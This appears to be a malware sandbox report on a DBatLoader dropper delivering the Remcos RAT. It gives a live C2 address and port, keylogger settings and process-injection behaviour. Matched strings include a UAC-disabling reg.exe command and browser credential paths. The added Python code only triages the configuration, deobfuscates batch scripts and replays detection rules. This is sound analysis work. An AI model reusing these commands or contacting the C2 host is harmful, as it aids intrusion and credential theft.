Windows Analysis Report
SHEOrder-10524.exe

Overview

General Information

Sample name: SHEOrder-10524.exe
Analysis ID: 1431184
MD5: 439f6db2adb770a0f825879c91da9904
SHA1: 6b997f099e01ba06378a58115f65d515a22f5fb1
SHA256: 9eef226fdb7d6c554cd552fc3f597ebfd6d77e33b95db53f7a631a75acf0c270
Tags: exeHUN

Detection

Remcos, DBatLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Drops PE files with a suspicious file extension
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sample uses process hollowing technique
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • SHEOrder-10524.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\SHEOrder-10524.exe" MD5: 439F6DB2ADB770A0F825879C91DA9904)
    • cmd.exe (PID: 7368 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\WagotghlO.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 7416 cmdline: C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\SHEOrder-10524.exe C:\\Users\\Public\\Libraries\\Wagotghl.PIF MD5: 9472AAB6390E4F1431BAA912FCFF9707)
    • lhgtogaW.pif (PID: 7432 cmdline: C:\Users\Public\Libraries\lhgtogaW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • lhgtogaW.pif (PID: 7548 cmdline: C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\zhrdpmieysz" MD5: C116D3604CEAFE7057D77FF27552C215)
      • lhgtogaW.pif (PID: 7556 cmdline: C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\kbfnqftxmarjte" MD5: C116D3604CEAFE7057D77FF27552C215)
      • lhgtogaW.pif (PID: 7576 cmdline: C:\Users\Public\Libraries\lhgtogaW.pif /stext "C:\Users\user\AppData\Local\Temp\mekgrxezaijovlxyi" MD5: C116D3604CEAFE7057D77FF27552C215)
  • Wagotghl.PIF (PID: 7636 cmdline: "C:\Users\Public\Libraries\Wagotghl.PIF" MD5: 439F6DB2ADB770A0F825879C91DA9904)
    • lhgtogaW.pif (PID: 7868 cmdline: C:\Users\Public\Libraries\lhgtogaW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • Wagotghl.PIF (PID: 7916 cmdline: "C:\Users\Public\Libraries\Wagotghl.PIF" MD5: 439F6DB2ADB770A0F825879C91DA9904)
    • lhgtogaW.pif (PID: 8068 cmdline: C:\Users\Public\Libraries\lhgtogaW.pif MD5: C116D3604CEAFE7057D77FF27552C215)
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: DBatLoader
Description: This Delphi loader misuses cloud storage services, such as Google Drive, to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it. In this analysis the download came from onedrive.live.com (see the Networking section).
Attribution: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
Malware configuration (Remcos, extracted from 14.1.lhgtogaW.pif.400000.3.unpack):
{"Version": "4.9.4 Pro", "Host:Port:Password": "91.223.3.151:4508", "Assigned name": "HCODE FILE", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-V052BG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
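The configuration above is what the report's extractor recovered from the unpacked Remcos image. What follows is an added example, not Joe Sandbox, Remcos or DBatLoader code, that turns those fields into hunting artifacts and triage flags. It assumes that the "Host:Port:Password" field can carry several '|'-separated entries with a third ':' component as the password, that Run-key setup only applies when the install routine runs, and it uses an arbitrary list of "standard" ports to flag the C2 port.

```python
"""Turn the Remcos configuration recovered by the report's extractor into
hunting artifacts and triage flags.

Added example, not Joe Sandbox, Remcos or DBatLoader code. Assumptions: the
"Host:Port:Password" field may hold several '|'-separated entries, a third
':'-separated component is the password, and the 'standard' port list used
to flag unusual C2 ports is an arbitrary choice."""
from typing import Dict, List, Tuple

# Copied from the configuration printed above (keys not used here omitted).
CONFIG: Dict[str, str] = {
    "Version": "4.9.4 Pro",
    "Host:Port:Password": "91.223.3.151:4508",
    "Assigned name": "HCODE FILE",
    "Install flag": "Disable",
    "Setup HKCU\\Run": "Enable",
    "Setup HKLM\\Run": "Enable",
    "Install path": "Application path",
    "Copy file": "remcos.exe",
    "Mutex": "Rmc-V052BG",
    "Keylog flag": "1",
    "Keylog path": "Application path",
    "Keylog file": "logs.dat",
    "Keylog crypt": "Disable",
    "Screenshot flag": "Disable",
}

STANDARD_PORTS = {80, 443, 8080}


def enabled(value: str) -> bool:
    """Remcos writes booleans as Enable/Disable or 1/0 depending on the field."""
    return value.strip().lower() in {"enable", "1", "true"}


def parse_c2(field: str) -> List[Tuple[str, int, str]]:
    """'host:port[:password]' entries separated by '|' (assumed format)."""
    out: List[Tuple[str, int, str]] = []
    for entry in filter(None, field.split("|")):
        parts = entry.split(":")
        if len(parts) < 2 or not parts[1].isdigit():
            raise ValueError(f"unparseable C2 entry: {entry!r}")
        # Anything after the port is the password; it may contain ':' itself.
        out.append((parts[0], int(parts[1]), ":".join(parts[2:])))
    return out


def triage(cfg: Dict[str, str]) -> Dict[str, object]:
    c2 = parse_c2(cfg["Host:Port:Password"])
    install = enabled(cfg.get("Install flag", ""))
    keylog = enabled(cfg.get("Keylog flag", "0"))
    # Run-key setup is part of the install routine, so it only matters when
    # install is enabled (assumption, consistent with this report seeing no
    # remcos Run key: the only one written came from the loader).
    run_keys = [
        hive + "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
        for hive in ("HKCU", "HKLM")
        if install and enabled(cfg.get(f"Setup {hive}\\Run", ""))
    ]
    return {
        "c2": c2,
        "nonstandard_ports": [port for _, port, _ in c2 if port not in STANDARD_PORTS],
        "mutex": cfg["Mutex"],
        "install": install,
        "install_copy": cfg["Copy file"] if install else None,
        "persistence_run_keys": run_keys,
        "keylogger": keylog,
        # "Application path" means next to the running binary; the sandbox
        # observed the file at C:\ProgramData\remcos\logs.dat.
        "keylog_file": cfg["Keylog file"] if keylog else None,
        "keylog_plaintext": keylog and not enabled(cfg.get("Keylog crypt", "")),
        "screenshots": enabled(cfg.get("Screenshot flag", "")),
    }


if __name__ == "__main__":
    for key, value in triage(CONFIG).items():
        print(f"{key}: {value}")
```

For this sample the interesting outputs are the C2 on a non-standard port, the mutex, and a plaintext keylog file while install (and therefore Remcos's own persistence) is disabled; the persistence seen in the Sigma hits is the loader's Run key, not the RAT's.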
Yara matches on dropped files
Source | Rule | Description | Author
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
C:\Users\Public\Libraries\WagotghlO.bat | MALWARE_BAT_KoadicBAT | Koadic post-exploitation framework BAT payload | ditekSHen
Matched strings (offset: identifier: content):
    • 0x2:$s1: &@cls&@set
    • 0x5b:$s2: :~41,1%%
    • 0x67:$s2: :~47,1%%
    • 0x73:$s2: :~6,1%%
    • 0x7e:$s2: :~53,1%%
    • 0x8a:$s2: :~1,1%
    • 0x9b:$s2: :~10,1%%
    • 0xa7:$s2: :~39,1%%
    • 0xb3:$s2: :~16,1%%
    • 0xbf:$s2: :~13,1%%
    • 0xcb:$s2: :~25,1%%
    • 0xd7:$s2: :~53,1%%
    • 0xe3:$s2: :~42,1%%
    • 0xef:$s2: :~22,1%%
    • 0xfb:$s2: :~18,1%%
    • 0x107:$s2: :~48,1%%
    • 0x113:$s2: :~51,1%%
    • 0x11f:$s2: :~2,1%%
    • 0x12a:$s2: :~61,1%%
    • 0x136:$s2: :~9,1%%
    • 0x141:$s2: :~19,1%%
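The strings matched above are single-character substring expansions (%var:~N,1%) chained back to back, the usual cmd.exe trick for rebuilding a command from a scrambled alphabet held in one `set` variable; the `&@cls&@set` string is the prologue that defines it. That pattern is what the rule keys on, so the Koadic label is the rule's name rather than evidence of Koadic here (every other detection on this page attributes the sample to DBatLoader and Remcos). Below is an added example, not code from the report, from DBatLoader or from Koadic, of a deobfuscator for this pattern. SAMPLE and the obfuscate() helper are constructed to mirror the matched strings; the recovered WagotghlO.bat itself is not reproduced on this page.

```python
"""Deobfuscator for cmd.exe batch scripts that rebuild a command out of
single-character substring expansions (%var:~start,len%), the pattern the
matched strings above (":~41,1%%") come from.

Added example, not code from the report, from DBatLoader or from Koadic.
SAMPLE and obfuscate() are constructed to mirror the matched pattern; the
recovered WagotghlO.bat is not on this page."""
import re
from typing import Dict, List, Optional

# %name%, %name:~start% and %name:~start,len% (cmd.exe substring syntax).
REF_RE = re.compile(r"%([^%:=]+?)(?::~(-?\d+)(?:,(-?\d+))?)?%")
# @set name=value / @set "name=value"  (set /a and set /p are not handled)
SET_RE = re.compile(r'^\s*@?set\s+"?([^="]+?)\s*=(.*)$', re.IGNORECASE)

# Constructed sample: the scrambled alphabet lives in k, the next line
# re-assembles a command one character at a time.
SAMPLE = (
    '@echo off&@cls&@set "k=xyzhelo wrd"\n'
    "%k:~3,1%%k:~4,1%%k:~5,1%%k:~5,1%%k:~6,1%%k:~7,1%"
    "%k:~8,1%%k:~6,1%%k:~9,1%%k:~5,1%%k:~10,1%\n"
)


def substr(value: str, start: int, length: Optional[int]) -> str:
    """cmd.exe semantics: negative start counts from the end, negative length
    drops that many trailing characters, missing length means 'to the end'."""
    n = len(value)
    if start < 0:
        start = max(n + start, 0)
    if start >= n:
        return ""
    if length is None:
        return value[start:]
    end = start + length if length >= 0 else n + length
    return value[start:end] if end > start else ""


def split_commands(line: str) -> List[str]:
    """Split on '&' outside double quotes, so set "a=x&y" keeps its value."""
    parts, buf, quoted = [], [], False
    for ch in line:
        if ch == '"':
            quoted = not quoted
        if ch == "&" and not quoted:
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    return [p.strip() for p in parts if p.strip()]


def expand(text: str, env: Dict[str, str]) -> str:
    """Resolve every %...% reference against env. Undefined names expand to
    "" (what cmd.exe does inside batch files)."""
    def repl(m: "re.Match[str]") -> str:
        value = env.get(m.group(1).lower(), "")
        if m.group(2) is None:
            return value
        length = int(m.group(3)) if m.group(3) is not None else None
        return substr(value, int(m.group(2)), length)
    return REF_RE.sub(repl, text)


def deobfuscate(script: str) -> List[str]:
    """Return each command with expansions resolved, in script order. `set`
    lines are evaluated as they are met so later lines see the alphabet."""
    env: Dict[str, str] = {}
    out: List[str] = []
    for line in script.splitlines():
        for cmd in split_commands(line):
            m = SET_RE.match(cmd)
            if m:
                value = m.group(2)
                if value.endswith('"'):
                    value = value[:-1]
                env[m.group(1).lower()] = expand(value, env)
                out.append(cmd)
            else:
                out.append(expand(cmd, env))
    return out


def obfuscate(command: str, var: str = "a") -> str:
    """Constructed stand-in for the loader's generator, used for testing:
    one %var:~i,1% per character of the command."""
    alphabet = ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
                "0123456789 :\\/.-_")
    refs = "".join(f"%{var}:~{alphabet.index(ch)},1%" for ch in command)
    return f'@echo off&@cls&@set "{var}={alphabet}"\n{refs}\n'


if __name__ == "__main__":
    for cmd in deobfuscate(SAMPLE):
        print(cmd)
```

The regex consumes each `%...%` reference left to right, so the `%%` that the Yara strings end in (one expansion closing and the next opening) never needs special handling; delayed (`!var!`) expansion, `set /a` and `call` re-parsing are out of scope and would need a second pass.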
Yara matches on memory dumps
Source | Rule | Description | Author
00000004.00000002.4155660149.000000002416C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
          • 0x6aab0:$a1: Remcos restarted by watchdog!
          • 0x6b028:$a3: %02i:%02i:%02i:%03i
00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
[71 entries in the full report; the remainder are not shown here]
Yara matches on unpacked PEs
Source | Rule | Description | Author
0.2.SHEOrder-10524.exe.28c0000.0.unpack | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
4.2.lhgtogaW.pif.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
4.2.lhgtogaW.pif.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
4.2.lhgtogaW.pif.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
                  • 0x6c4a8:$a1: Remcos restarted by watchdog!
                  • 0x6ca20:$a3: %02i:%02i:%02i:%03i
4.2.lhgtogaW.pif.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
                  • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x6656c:$str_b2: Executing file:
                  • 0x675ec:$str_b3: GetDirectListeningPort
                  • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x67118:$str_b7: \update.vbs
                  • 0x66594:$str_b9: Downloaded file:
                  • 0x66580:$str_b10: Downloading file:
                  • 0x66624:$str_b12: Failed to upload file:
                  • 0x675b4:$str_b13: StartForward
                  • 0x675d4:$str_b14: StopForward
                  • 0x67070:$str_b15: fso.DeleteFile "
                  • 0x67004:$str_b16: On Error Resume Next
                  • 0x670a0:$str_b17: fso.DeleteFolder "
                  • 0x66614:$str_b18: Uploaded file:
                  • 0x665d4:$str_b19: Unable to delete:
                  • 0x67038:$str_b20: while fso.FileExists("
                  • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
[36 entries in the full report; the remainder are not shown here]

                  System Summary

Source: Process started | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: Command: C:\Users\Public\Libraries\lhgtogaW.pif, CommandLine: C:\Users\Public\Libraries\lhgtogaW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lhgtogaW.pif, NewProcessName: C:\Users\Public\Libraries\lhgtogaW.pif, OriginalFileName: C:\Users\Public\Libraries\lhgtogaW.pif, ParentCommandLine: "C:\Users\user\Desktop\SHEOrder-10524.exe", ParentImage: C:\Users\user\Desktop\SHEOrder-10524.exe, ParentProcessId: 7276, ParentProcessName: SHEOrder-10524.exe, ProcessCommandLine: C:\Users\Public\Libraries\lhgtogaW.pif, ProcessId: 7432, ProcessName: lhgtogaW.pif
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\Public\Wagotghl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SHEOrder-10524.exe, ProcessId: 7276, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wagotghl
Source: Network Connection | Author: Florian Roth (Nextron Systems), Tim Shelton | Data: DestinationIp: 91.223.3.151, DestinationIsIpv6: false, DestinationPort: 4508, EventID: 3, Image: C:\Users\Public\Libraries\lhgtogaW.pif, Initiated: true, ProcessId: 7432, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\Public\Wagotghl.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SHEOrder-10524.exe, ProcessId: 7276, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wagotghl
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: C:\Users\Public\Libraries\lhgtogaW.pif, CommandLine: C:\Users\Public\Libraries\lhgtogaW.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\lhgtogaW.pif, NewProcessName: C:\Users\Public\Libraries\lhgtogaW.pif, OriginalFileName: C:\Users\Public\Libraries\lhgtogaW.pif, ParentCommandLine: "C:\Users\user\Desktop\SHEOrder-10524.exe", ParentImage: C:\Users\user\Desktop\SHEOrder-10524.exe, ParentProcessId: 7276, ParentProcessName: SHEOrder-10524.exe, ProcessCommandLine: C:\Users\Public\Libraries\lhgtogaW.pif, ProcessId: 7432, ProcessName: lhgtogaW.pif
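The Sigma hits above are single-event matches on a process start, a Run-key write and an outbound connection. The following added example (not the Sigma rules themselves and not Joe Sandbox code) replays records constructed from the values printed in this report through equivalent predicates, and adds two the report does not express as Sigma rules: extrac32.exe run in /C mode as a plain copy utility (the process tree shows it cloning the dropper into C:\Users\Public\Libraries) and the creation of the Remcos keylog file logs.dat. Field names follow Sysmon's; the directory and extension lists are deliberately short subsets of what the real rules cover.

```python
"""Replay the host telemetry in this report (process starts, a Run-key write,
an outbound connection, the logs.dat file create) through Sigma-style
predicates, to show what the 'Sigma detected' lines key on.

Added example, not the Sigma rules and not Joe Sandbox code. The event
records are constructed from values printed in the report, in a Sysmon-like
field layout; the benign notepad++ record is made up as a control."""
from typing import Callable, Dict, List, Tuple

Event = Dict[str, object]

EVENTS: List[Event] = [
    {"EventID": 1, "ProcessId": 7416,
     "Image": r"C:\Windows\System32\extrac32.exe",
     "CommandLine": r"C:\Windows\System32\extrac32.exe /C /Y C:\Users\user\Desktop\SHEOrder-10524.exe C:\Users\Public\Libraries\Wagotghl.PIF",
     "ParentImage": r"C:\Users\user\Desktop\SHEOrder-10524.exe"},
    {"EventID": 1, "ProcessId": 7432,
     "Image": r"C:\Users\Public\Libraries\lhgtogaW.pif",
     "CommandLine": r"C:\Users\Public\Libraries\lhgtogaW.pif",
     "ParentImage": r"C:\Users\user\Desktop\SHEOrder-10524.exe"},
    {"EventID": 13, "ProcessId": 7276,
     "Image": r"C:\Users\user\Desktop\SHEOrder-10524.exe",
     "TargetObject": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Wagotghl",
     "Details": r"C:\Users\Public\Wagotghl.url"},
    {"EventID": 3, "ProcessId": 7432, "Initiated": True, "Protocol": "tcp",
     "Image": r"C:\Users\Public\Libraries\lhgtogaW.pif",
     "DestinationIp": "91.223.3.151", "DestinationPort": 4508},
    {"EventID": 11, "ProcessId": 7432,
     "Image": r"C:\Users\Public\Libraries\lhgtogaW.pif",
     "TargetFilename": r"C:\ProgramData\remcos\logs.dat"},
    # Constructed benign control record: nothing below should fire on it.
    {"EventID": 1, "ProcessId": 4242,
     "Image": r"C:\Program Files\Notepad++\notepad++.exe",
     "CommandLine": r'"C:\Program Files\Notepad++\notepad++.exe" notes.txt',
     "ParentImage": r"C:\Windows\explorer.exe"},
]

# Short subsets of the real rules' lists, enough for this report's paths.
SUSPICIOUS_DIRS = ("c:\\users\\public\\", "c:\\programdata\\", "\\appdata\\local\\temp\\")
SUSPICIOUS_EXTS = (".pif", ".scr", ".com", ".cpl")


def in_suspicious_dir(path: str) -> bool:
    return any(d in path.lower() for d in SUSPICIOUS_DIRS)


def rule_exec_suspicious_folder(e: Event) -> bool:
    return e["EventID"] == 1 and in_suspicious_dir(str(e["Image"]))


def rule_suspicious_extension(e: Event) -> bool:
    return e["EventID"] == 1 and str(e["Image"]).lower().endswith(SUSPICIOUS_EXTS)


def rule_extrac32_copy(e: Event) -> bool:
    """extrac32.exe with /C is a file copy, the LOLBin step that cloned the
    dropper into the Public Libraries folder in the process tree."""
    cmd = str(e.get("CommandLine", "")).lower()
    return (e["EventID"] == 1
            and str(e["Image"]).lower().endswith("\\extrac32.exe")
            and " /c " in cmd)


def rule_run_key_suspicious_folder(e: Event) -> bool:
    return (e["EventID"] == 13
            and "\\currentversion\\run\\" in str(e["TargetObject"]).lower()
            and in_suspicious_dir(str(e["Details"])))


def rule_network_from_suspicious_location(e: Event) -> bool:
    return (e["EventID"] == 3 and bool(e.get("Initiated"))
            and in_suspicious_dir(str(e["Image"])))


def rule_remcos_keylog_file(e: Event) -> bool:
    return (e["EventID"] == 11
            and str(e["TargetFilename"]).lower().endswith("\\remcos\\logs.dat"))


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("Execution from Suspicious Folder", rule_exec_suspicious_folder),
    ("Execution of Suspicious File Type Extension", rule_suspicious_extension),
    ("extrac32 used as copy utility", rule_extrac32_copy),
    ("New RUN Key Pointing to Suspicious Folder", rule_run_key_suspicious_folder),
    ("Suspicious Program Location with Network Connections", rule_network_from_suspicious_location),
    ("Remcos keylog file created", rule_remcos_keylog_file),
]


def evaluate(events: List[Event]) -> Dict[str, List[int]]:
    """Map each rule name to the ProcessIds of the events it matched."""
    hits: Dict[str, List[int]] = {}
    for e in events:
        for name, pred in RULES:
            if pred(e):
                hits.setdefault(name, []).append(int(e["ProcessId"]))
    return hits


if __name__ == "__main__":
    for name, pids in evaluate(EVENTS).items():
        print(f"{name}: PIDs {pids}")
```

Every predicate checks EventID first, so fields that only exist on one event type are never read on another; in a real pipeline the same predicates sit behind the Sigma rule names the report lists, with far longer path and extension lists.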

                  Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\Public\Libraries\lhgtogaW.pif, ProcessId: 7432, TargetFilename: C:\ProgramData\remcos\logs.dat
                  No Snort rule has matched


                  AV Detection

Source: http://geoplugin.net/json.gp/C | URL Reputation: Label: phishing
Source: http://geoplugin.net/json.gp | URL Reputation: Label: phishing
Note: geoplugin.net is a public IP-geolocation API; the GET /json.gp request in the Networking section is the sample looking up its own location, so treat the domain as a beacon indicator for this family rather than as payload hosting.
Source: 14.1.lhgtogaW.pif.400000.3.unpack | Malware Configuration Extractor: Remcos (configuration as printed above)
Source: C:\Users\Public\Libraries\Wagotghl.PIF | ReversingLabs: Detection: 47%
Source: C:\Users\Public\Libraries\netutils.dll | ReversingLabs: Detection: 28%
Source: SHEOrder-10524.exe | ReversingLabs: Detection: 47%
Source: Yara match | File sources, type UNPACKEDPE: 4.2.lhgtogaW.pif.400000.0.raw.unpack; 10.1.lhgtogaW.pif.400000.3.unpack; 4.1.lhgtogaW.pif.400000.3.unpack; 14.1.lhgtogaW.pif.400000.3.raw.unpack; 14.1.lhgtogaW.pif.400000.3.unpack; 4.2.lhgtogaW.pif.400000.0.unpack; 4.1.lhgtogaW.pif.400000.3.raw.unpack; 10.1.lhgtogaW.pif.400000.3.raw.unpack
Source: Yara match | File sources, type MEMORY: 00000004.00000002.4155660149.000000002416C000.00000004.00000020.00020000.00000000.sdmp; 0000000A.00000001.1882448821.0000000000490000.00000040.00000001.00020000.00000000.sdmp; 00000000.00000003.1717116451.000000007E700000.00000004.00001000.00020000.00000000.sdmp; 00000004.00000001.1717466391.0000000000490000.00000040.00000001.00020000.00000000.sdmp; 00000004.00000002.4137990797.0000000000400000.00000040.00000400.00020000.00000000.sdmp; 00000004.00000002.4156653259.0000000025BBF000.00000004.00000010.00020000.00000000.sdmp; 0000000E.00000001.1938580336.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp; 00000004.00000002.4137990797.0000000000490000.00000040.00000400.00020000.00000000.sdmp; 0000000E.00000001.1938580336.0000000000490000.00000040.00000001.00020000.00000000.sdmp; 00000004.00000002.4155660149.000000002412E000.00000004.00000020.00020000.00000000.sdmp; 00000000.00000002.1733060343.000000007E790000.00000004.00001000.00020000.00000000.sdmp; 0000000A.00000001.1882448821.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp; 0000000E.00000001.1938580336.0000000000400000.00000040.00000001.00020000.00000000.sdmp; 00000004.00000003.1775014710.0000000024164000.00000004.00000020.00020000.00000000.sdmp; 00000004.00000002.4137990797.0000000000AC0000.00000040.00000400.00020000.00000000.sdmp; 00000004.00000001.1717466391.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp; 0000000A.00000001.1882448821.0000000000400000.00000040.00000001.00020000.00000000.sdmp; 00000004.00000001.1717466391.0000000000400000.00000040.00000001.00020000.00000000.sdmp
Source: Yara match | File sources, type MEMORYSTR: Process Memory Space: SHEOrder-10524.exe PID: 7276; lhgtogaW.pif PID: 7432; lhgtogaW.pif PID: 7868; lhgtogaW.pif PID: 8068
Source: Yara match | File source, type DROPPED: C:\ProgramData\remcos\logs.dat
Source: C:\Users\Public\Libraries\Wagotghl.PIF | Joe Sandbox ML: detected
Source: SHEOrder-10524.exe | Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,4_2_00433837
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 4_1_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,4_1_00433837
Source: C:\Users\Public\Libraries\lhgtogaW.pif | Code function: 5_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,5_2_00404423
